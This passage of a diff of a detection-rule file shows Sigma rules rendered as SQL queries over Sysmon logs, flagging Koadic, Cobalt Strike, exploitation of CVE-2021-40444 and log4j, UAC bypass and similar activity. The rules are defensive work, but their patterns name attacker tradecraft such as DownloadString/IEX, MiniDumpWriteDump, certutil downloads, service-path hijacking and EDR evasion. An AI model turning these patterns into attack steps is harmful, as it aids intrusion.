"attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE 